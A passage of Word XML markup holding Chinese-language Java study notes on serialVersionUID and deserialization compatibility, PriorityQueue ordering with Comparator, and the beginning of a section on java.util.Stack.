        <w:t>serialVersionUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行比较，如果相同就认为是一致的，可以进行反序列化，否则就会出现序列化版本不一致的异常，即是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InvalidCastException</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D70EF" w:rsidRDefault="007D70EF" w:rsidP="007D70EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>serialVersionUID作用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D70EF" w:rsidRDefault="007D70EF" w:rsidP="007D70EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>    序列化时为了保持版本的兼容性，即在版本升级时反序列化仍保持对象的唯一性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D70EF" w:rsidRDefault="007D70EF" w:rsidP="007D70EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>    如果你修改代码重新部署后出现序列化错误，可以考虑给相应的类增加serialVersionUID字段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D70EF" w:rsidRDefault="007D70EF" w:rsidP="007D70EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>    一般来说有两种生成方式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D70EF" w:rsidRDefault="007D70EF" w:rsidP="007D70EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>    一个是默认的1L，比如：private static final long serialVersionUID = 1L;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D70EF" w:rsidRDefault="007D70EF" w:rsidP="007D70EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>    一个是根据</w:t>
      </w:r>
      <w:r w:rsidRPr="0064444B">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>类名、接口名、成员方法及属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>等来生成一个64位的哈希字段，比如：private static final long serialVersionUID = -8940196742313994740L;之类的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="007D70EF" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidR="00814280" w:rsidRPr="00881F00">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://swiftlet.net/archives/1268</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A932F1" w:rsidRDefault="000429FD" w:rsidP="00115125">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="00A932F1" w:rsidRPr="00A932F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.mkyong.com/java-best-practices/understand-the-serialversionuid/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00814280" w:rsidRDefault="00814280" w:rsidP="00115125">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00814280" w:rsidRPr="00F75154" w:rsidRDefault="00814280" w:rsidP="00814280">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.12.2 readResolve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00814280" w:rsidRPr="00F41A4C" w:rsidRDefault="00814280" w:rsidP="00115125">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B5618B" w:rsidRDefault="00AD1F93" w:rsidP="00B5618B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidR="0087699E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="003E0B29">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00B5618B">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE340D" w:rsidRPr="00A85F48" w:rsidRDefault="00AE340D" w:rsidP="00A85F48">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="009D238F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  PriorityQueue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E36FA9" w:rsidRPr="00E36FA9" w:rsidRDefault="002331F4" w:rsidP="00E36FA9">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B63D00" w:rsidRPr="004816B3">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>优先队列本质上就是一个最小堆</w:t>
      </w:r>
      <w:r w:rsidR="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A85F48" w:rsidRDefault="00E36FA9" w:rsidP="00E36FA9">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PriorityQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是从</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK1.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>开始提供的新的数据结构接口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0B29" w:rsidRDefault="00A85F48" w:rsidP="00E36FA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E36FA9" w:rsidRPr="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果不提供</w:t>
      </w:r>
      <w:r w:rsidR="00E36FA9" w:rsidRPr="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidR="00E36FA9" w:rsidRPr="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的话，优先队列中元素默认按自然顺序排列，也就是数字默认是小的在队列头，字符串则按字典序排列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E36FA9" w:rsidRPr="00E36FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果想实现按照自己的意愿进行优先级排列的队列的话，需要</w:t>
      </w:r>
      <w:r w:rsidR="00E36FA9" w:rsidRPr="00A85F48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="00E36FA9" w:rsidRPr="00A85F48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidR="00E36FA9" w:rsidRPr="00A85F48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidR="00474107">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00474107" w:rsidRPr="00474107">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>优先级队列不允许</w:t>
      </w:r>
      <w:r w:rsidR="00474107" w:rsidRPr="00474107">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> null </w:t>
      </w:r>
      <w:r w:rsidR="00474107" w:rsidRPr="00474107">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>元素</w:t>
      </w:r>
      <w:r w:rsidR="00474107">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D238F" w:rsidRDefault="009D238F" w:rsidP="00E36FA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D238F" w:rsidRPr="009D238F" w:rsidRDefault="00B01AD4" w:rsidP="00E36FA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01AD4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/chengyingzhilian/article/details/8078032</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B43E4F" w:rsidRDefault="00B43E4F" w:rsidP="00B43E4F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">AVA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25756">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.util.Stack </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>类的构造方法创建对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> public class Stack extends vector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>构造方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> public Stack() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>创建一个空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B872EE" w:rsidRDefault="00B872EE" w:rsidP="00B872EE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  1. public push  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
